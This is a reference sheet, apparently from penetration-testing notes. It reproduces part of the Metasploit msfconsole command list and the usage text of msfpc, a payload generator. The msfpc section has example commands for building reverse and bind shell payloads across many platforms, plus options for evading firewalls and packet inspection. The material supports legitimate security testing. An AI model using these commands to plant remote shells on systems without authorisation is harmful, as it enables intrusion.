MSFconsole
pushm         Pushes the active or list of modules onto the module stack
quit          Exit the console
reload_all    Reloads all modules from all defined module paths
rename_job    Rename a job
resource      Run the commands stored in a file
route         Route traffic through a session
save          Saves the active datastores
search        Searches module names and descriptions
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
show          Displays modules of a given type, or all modules
Command reference: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
MSF payload creator

/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: /usr/bin/msfpc windows 192.168.1.10        # Windows & manual IP.
         /usr/bin/msfpc elf bind eth0 4444          # Linux, eth0's IP & manual port.
         /usr/bin/msfpc stageless cmd py https      # Python, stageless command prompt.
         /usr/bin/msfpc verbose loop eth1           # A payload for every type, using eth1's IP.
         /usr/bin/msfpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
         /usr/bin/msfpc help verbose                # Help screen, with even more information.

<TYPE>:
  + ASP
  + ASPX
  + Bash [.sh]
  + Java [.jsp]
  + Linux [.elf]
  + OSX [.macho]
  + Perl [.pl]
  + PHP
  + Powershell [.ps1]
  + Python [.py]
  + Tomcat [.war]
  + Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can give an interface name and MPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interact with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewall rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with egress firewall rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More ‘stable’ than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.

<TCP> is the standard method of connecting back. This is the most compatible with TYPES as it is RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limits port access on protocol – e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using SSL. Helpful for packet inspection, which limits port access on protocol – e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with strict ingress/egress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGELESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.